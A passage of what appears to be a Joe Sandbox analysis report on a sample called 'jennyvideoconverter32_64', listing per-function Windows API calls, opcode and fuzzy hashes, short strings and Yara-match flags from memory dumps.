                                                                                • Opcode ID: 5fa3ef6237c707372226585469e17dc4d2a2dd28d15495116066a85131efa63a
                                                                                • Instruction ID: 4d788433452a9b0146499abd3f20bd4a49e24d6fe5cdaf856d30b71f3f2a2586
                                                                                • Opcode Fuzzy Hash: 5fa3ef6237c707372226585469e17dc4d2a2dd28d15495116066a85131efa63a
                                                                                • Instruction Fuzzy Hash: 65118172D04154DBDB11AFA4D808AAEFBBAFF45310F10851AE855A2360D7714E61DB91
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8229D
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D822B0
                                                                                • TlsGetValue.KERNEL32 ref: 02D822E7
                                                                                • TlsSetValue.KERNEL32(?), ref: 02D82300
                                                                                • TlsSetValue.KERNEL32(?,?,?), ref: 02D8231C
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                                  • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                                  • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 31084287224e075d9c8bd76beecc2f14717619e456446690ecfee69fa02ecc42
                                                                                • Instruction ID: 46a469ada0611b7c2b2ac84d51b990e7be957eb6deb15597918849ccbbcd1596
                                                                                • Opcode Fuzzy Hash: 31084287224e075d9c8bd76beecc2f14717619e456446690ecfee69fa02ecc42
                                                                                • Instruction Fuzzy Hash: 77116072D14118DBDB02AFA4D814AAEFFBAFF54310F10451AE805A3350D7714D61DF90
                                                                                APIs
                                                                                  • Part of subcall function 02D8B098: __EH_prolog.LIBCMT ref: 02D8B09D
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D8BC62
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02DB1D94,?,00000001), ref: 02D8BC78
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D8BC8B
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02DB1D94,?,00000001), ref: 02D8BC9B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8BCA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2725315915-0
                                                                                • Opcode ID: f1bba5356d05ab2a53e752f67a4d0f3495253efa165e452f9995b0864a9bc9fc
                                                                                • Instruction ID: a67384a3c81cbcd91cb4d52242b596cabd4c86bd5b32825395368c9065f3222f
                                                                                • Opcode Fuzzy Hash: f1bba5356d05ab2a53e752f67a4d0f3495253efa165e452f9995b0864a9bc9fc
                                                                                • Instruction Fuzzy Hash: 760181B6A40304AFEB10AAB4DC89F9BB7BDEB04759F104915F625D6390DB60EC059B24
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D82432
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D82445
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D82454
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82469
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 747265849-0
                                                                                • Opcode ID: 2d001cda663109f9bb59415e9fbc51fa9a84ab59fa82543c36f1718208a29d8e
                                                                                • Instruction ID: b1a32229f16d0f997d20d9e04bd2bc7dcd855225926aa5fec2727f9148c347b8
                                                                                • Opcode Fuzzy Hash: 2d001cda663109f9bb59415e9fbc51fa9a84ab59fa82543c36f1718208a29d8e
                                                                                • Instruction Fuzzy Hash: 69F01D72641204BFE610AAA5ED4AFDAB72CFB45711FA04811F601D6680D761AD20CBB5
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D81ED2
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D81EEA
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D81EF9
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D81F0E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D81F15
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 830998967-0
                                                                                • Opcode ID: cc02ec2bea8588469350d2c9fa75681387b718e7892db77b4c77682f3a4f84e4
                                                                                • Instruction ID: 152ca60721b80d130a49a99316393ec76d0910b24079d0a3a5c2ffe24a8f110d
                                                                                • Opcode Fuzzy Hash: cc02ec2bea8588469350d2c9fa75681387b718e7892db77b4c77682f3a4f84e4
                                                                                • Instruction Fuzzy Hash: 7BF03A72641605BBE700AFA1ED89FDABB3CFF45351F100416F60186681D775E925CBE4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 4104443479-4289949731
                                                                                • Opcode ID: 8326b474946b88ae90019abfb7b6de1e7552942a6dbfceb2c65b856aef94715f
                                                                                • Instruction ID: 1022436d742e6d3d64cec6356e0b6280fc0ad0a3029ed5ac298a70d147376ab6
                                                                                • Opcode Fuzzy Hash: 8326b474946b88ae90019abfb7b6de1e7552942a6dbfceb2c65b856aef94715f
                                                                                • Instruction Fuzzy Hash: E041B3313003499FD734EE69DC94A6AB7BAEB41724B80092DE896CB781C770ED04DBA4
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D830C3
                                                                                • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D83102
                                                                                • _memcmp.LIBCMT ref: 02D83141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastString_memcmp
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 1618111833-2422070025
                                                                                • Opcode ID: 8d79f2de51126b540923890ff673ad800d91b81672b63aeecb1467ec9e9bdcb7
                                                                                • Instruction ID: d69b42c6ddf92224d6a6e2c4409af79ae78b1c5fd044c9cd1f9f98302ae339c0
                                                                                • Opcode Fuzzy Hash: 8d79f2de51126b540923890ff673ad800d91b81672b63aeecb1467ec9e9bdcb7
                                                                                • Instruction Fuzzy Hash: 10319371A003059FDF20AFA4C880B6EB7A6FF45B25F1085A9E86D97380DB719D45CB91
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D81F5B
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D81FC5
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 02D81FD2
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                • String ID: iocp
                                                                                • API String ID: 998023749-976528080
                                                                                • Opcode ID: 430e5e782a871af1fb7d846b38b5fef6407a07e0d7c827cf5dfa6ad8b97bb418
                                                                                • Instruction ID: 08a2ff5aff6377f97277cb6323fba0940c1e0b3e7a05d94e88daa8991627b227
                                                                                • Opcode Fuzzy Hash: 430e5e782a871af1fb7d846b38b5fef6407a07e0d7c827cf5dfa6ad8b97bb418
                                                                                • Instruction Fuzzy Hash: DC21D5B1801B449BC720DF6AD50095BFBF8FF94720B108A1FD4A683B90D7B0AA04CFA1
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • std::exception::exception.LIBCMT ref: 02D93AC5
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D93ADA
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3074076210-2104205924
                                                                                • Opcode ID: eeca74cb39445c94933c9abc996e050d9fa17a0a88ac2a53b635477279e60c7a
                                                                                • Instruction ID: 3fc0af5942e0040ca42931255060f9bcb535105e9c6ea0a673c0cfe1747fd0fa
                                                                                • Opcode Fuzzy Hash: eeca74cb39445c94933c9abc996e050d9fa17a0a88ac2a53b635477279e60c7a
                                                                                • Instruction Fuzzy Hash: 7CE0A930A0420EAADF00EAA0CC18DAFBB6AEF01314F000595BC14A2390EB70CE04DAA0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D837B6
                                                                                • __localtime64.LIBCMT ref: 02D837C1
                                                                                  • Part of subcall function 02D92540: __gmtime64_s.LIBCMT ref: 02D92553
                                                                                • std::exception::exception.LIBCMT ref: 02D837D9
                                                                                  • Part of subcall function 02D92413: std::exception::_Copy_str.LIBCMT ref: 02D9242C
                                                                                  • Part of subcall function 02D8A45B: __EH_prolog.LIBCMT ref: 02D8A460
                                                                                  • Part of subcall function 02D8A45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A46F
                                                                                  • Part of subcall function 02D8A45B: __CxxThrowException@8.LIBCMT ref: 02D8A48E
                                                                                Strings
                                                                                • could not convert calendar time to UTC time, xrefs: 02D837CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                • String ID: could not convert calendar time to UTC time
                                                                                • API String ID: 1963798777-2088861013
                                                                                • Opcode ID: fbe5e03c32fe6e54e04e8b29e7d11b91b6589a3ee69c290993f8af92cae26256
                                                                                • Instruction ID: 7163a06f384587a956d7f33004a235c2fdd73ed5d3819f894d8a40f697e4ad97
                                                                                • Opcode Fuzzy Hash: fbe5e03c32fe6e54e04e8b29e7d11b91b6589a3ee69c290993f8af92cae26256
                                                                                • Instruction Fuzzy Hash: 6EE06DB1D0120AABCF00EF94E824BBEB779EB04300F404599EC25A2750EB345E0A8EA5
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00008000,00004000,7622DFF0,?,00000000), ref: 00404092
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                                                • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Free$Virtual$Heap
                                                                                • String ID: -@
                                                                                • API String ID: 2016334554-2999422947
                                                                                • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                                                • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustPointer_memmove
                                                                                • String ID:
                                                                                • API String ID: 1721217611-0
                                                                                • Opcode ID: e1dd2b6ac54bbe24592cbc10073a9c86c922558a5a35cc837f81a00cd66b5fd6
                                                                                • Instruction ID: 3f00ac930eecadd9c8830e4efa3521de9a7a9363029a2812266da3362ef15e31
                                                                                • Opcode Fuzzy Hash: e1dd2b6ac54bbe24592cbc10073a9c86c922558a5a35cc837f81a00cd66b5fd6
                                                                                • Instruction Fuzzy Hash: 4241B3363543029BEF246F64D850BBA33A6DF0A754F14441FF889863E1DB21FD80CA22
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D912FF
                                                                                  • Part of subcall function 02D83FDC: __EH_prolog.LIBCMT ref: 02D83FE1
                                                                                  • Part of subcall function 02D83FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D83FF3
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D912F4
                                                                                • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91340
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91411
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$Event$CreateH_prolog
                                                                                • String ID:
                                                                                • API String ID: 2825413587-0
                                                                                • Opcode ID: 617dc63b9b1fbad859ac0d16e221a24b1e6c7b59f61b2574d09274e79bb3e271
                                                                                • Instruction ID: bae74f943cd4849272017f6278a9388c4290a9e2a76a3b58fcdc9dd534fe7c00
                                                                                • Opcode Fuzzy Hash: 617dc63b9b1fbad859ac0d16e221a24b1e6c7b59f61b2574d09274e79bb3e271
                                                                                • Instruction Fuzzy Hash: 9F516A716006468BDF21DF28C884B9AB7F5AB88328F194628F8AD97790DB35DC05CB95
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                                • Instruction ID: f99ff607956df160f6f72bde36a7859936e45677c9ab4f45503d55e42581232c
                                                                                • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                                • Instruction Fuzzy Hash: D541E2B5B00706ABDF988FA9C8905AA77A6EF40364B1086BDF815C7340E772DD41CB50
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D9FE8B
                                                                                • __isleadbyte_l.LIBCMT ref: 02D9FEB9
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02D9FEE7
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02D9FF1D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 30ef085e0597972883fe5bff83e7bc62d421ed0dfee7701e99fb8d5c893576dd
                                                                                • Instruction ID: bd4effb3476c472fe8aedcdb3e3acf30024f32c465870b4a9b07d40e92818af8
                                                                                • Opcode Fuzzy Hash: 30ef085e0597972883fe5bff83e7bc62d421ed0dfee7701e99fb8d5c893576dd
                                                                                • Instruction Fuzzy Hash: 00319C31600246AFEF218F79C844BAA7BAAFF41354F154569F868CBAE1E730DC51DB90
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID: -@$r@$r@
                                                                                • API String ID: 1263568516-1251997348
                                                                                • Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                                • Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
                                                                                • Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                                • Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58
                                                                                APIs
                                                                                • htons.WS2_32(?), ref: 02D83DA2
                                                                                  • Part of subcall function 02D83BD3: __EH_prolog.LIBCMT ref: 02D83BD8
                                                                                  • Part of subcall function 02D83BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                                                • htonl.WS2_32(00000000), ref: 02D83DB9
                                                                                • htonl.WS2_32(00000000), ref: 02D83DC0
                                                                                • htons.WS2_32(?), ref: 02D83DD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                • String ID:
                                                                                • API String ID: 3882411702-0
                                                                                • Opcode ID: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                                                • Instruction ID: 344b09f7ac92c841658670af48fd2214ac5eb1e26639ae0a9658c9bc6ad11d7e
                                                                                • Opcode Fuzzy Hash: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                                                • Instruction Fuzzy Hash: DA117C75A00209EBDF01AF64D885EAAB7B9EF09710F008496FD08DF305E6719E14CBA1
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D823D0
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D823DE
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82401
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82408
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: 7af8bff69ba37e9ff5e66f413ce10fb6ca7777218d127a32c5ea1e611cce25c4
                                                                                • Instruction ID: a4eacb50f95c85de5b30e15a75326156c6f543186b8532c10ac175f7a26d86be
                                                                                • Opcode Fuzzy Hash: 7af8bff69ba37e9ff5e66f413ce10fb6ca7777218d127a32c5ea1e611cce25c4
                                                                                • Instruction Fuzzy Hash: 0911E171A00304ABEB10AF64C889F6ABBB9FF40704F20446DF9019B240E7B1FD11CBA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction ID: 8a6651450a1a1edaac199594b57661c05987a6ad1f8319d79dd3ca57578e91d1
                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction Fuzzy Hash: EE01097205014ABBCF126E84CC418EE3F66BB1D358F488416FA6899231D737C9B1EB91
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D824A9
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D824B8
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D824CD
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D824D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: 3d994d7bdc313ee9066316d61e2fa16a2a3391ca382f26e4760d53a868a05c91
                                                                                • Instruction ID: 7dc270a6f24b4948ef9b63f7f9984f3ec1010c28492641e95e4d04979265a006
                                                                                • Opcode Fuzzy Hash: 3d994d7bdc313ee9066316d61e2fa16a2a3391ca382f26e4760d53a868a05c91
                                                                                • Instruction Fuzzy Hash: CCF03C72540205AFEB00AFA9E845F9ABBBCFF45711F108419FA05C6241D771E960CFA4
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D82009
                                                                                • RtlDeleteCriticalSection.NTDLL(?), ref: 02D82028
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D82037
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D8204E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                • String ID:
                                                                                • API String ID: 2456309408-0
                                                                                • Opcode ID: 777bfc9717109429f3884f5568ae730561c2ef80032730d4c0aa96a913c557c3
                                                                                • Instruction ID: 6b4dfc1a3569913e24acbe4b8162ca36a9dd77b9ddff0a7c0859ab473c671503
                                                                                • Opcode Fuzzy Hash: 777bfc9717109429f3884f5568ae730561c2ef80032730d4c0aa96a913c557c3
                                                                                • Instruction Fuzzy Hash: 6401A9718006449BD738AF64E908BAAFBB5FF04704F20495DE84682BA0CBB46D48CF64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$H_prologSleep
                                                                                • String ID:
                                                                                • API String ID: 1765829285-0
                                                                                • Opcode ID: ec3f968e3098b67af8cbd9264077be97a8faef05afa91847f0a1128f06340ada
                                                                                • Instruction ID: 201132100f51793ef996c34dd50acf7bbe236cd6cbd8894ea641a098337a240b
                                                                                • Opcode Fuzzy Hash: ec3f968e3098b67af8cbd9264077be97a8faef05afa91847f0a1128f06340ada
                                                                                • Instruction Fuzzy Hash: B4F09A32A40510EFDB009FA4E889F8DBBB0FF08321F1081A8FA0A8B390C7359C40CB65
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,r@,0040485C,r@,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3), ref: 0040476B
                                                                                • HeapFree.KERNEL32(00000000,?), ref: 004047A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Free$HeapVirtual
                                                                                • String ID: r@$r@
                                                                                • API String ID: 3783212868-1712950306
                                                                                • Opcode ID: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                                                • Instruction ID: 9f28707f468f96f8ba01f1c404cbd9d3f6c084a3717c71e7c0065962692db169
                                                                                • Opcode Fuzzy Hash: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                                                • Instruction Fuzzy Hash: C6F01774544210DFC3248F08EE08A427BA0FB88720B11867EF996672E1C371AC50CF88
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
